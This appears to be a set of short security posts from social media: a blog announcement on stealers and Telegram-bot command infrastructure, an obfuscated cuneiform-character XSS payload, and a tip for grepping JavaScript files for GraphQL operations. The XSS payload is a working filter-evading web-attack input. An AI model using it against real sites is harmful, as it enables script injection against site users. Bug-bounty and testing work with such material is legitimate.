My blog is now live: "The Close Relationship Between Telegram Bots and Threat Actors"
new stealers, their log structures, telegram bot C2 infrastructure, and threat actors who hacked themselves while building their own
๐ https://t.co/dArAo5wKyr
happy hunting!
an XSS payload, Cuneiform-alphabet based
๐='',๐บ=!๐+๐,๐=!๐บ+๐,๐บ=๐+{},๐=๐บ[๐++],
๐=๐บ[๐ซ=๐],๐=++๐ซ+๐,๐น=๐บ[๐ซ+๐],๐บ[๐น+=๐บ[๐]
+(๐บ.๐+๐บ)[๐]+๐[๐]+๐+๐+๐บ[๐ซ]+๐น+๐+๐บ[๐]
+๐][๐น](๐[๐]+๐[๐ซ]+๐บ[๐]+๐+๐+"(๐)")()
#bugbounty#bugbountytips#cybersecurity
How to grab all Graphql query/mutation if introspection disabled?
1. Download all js files to directory js_files
2. Run this command:
grep -Eo '(query|mutation) [a-zA-Z0-9_]+\(' js_files -R
1/n
#bugbountytips#graphql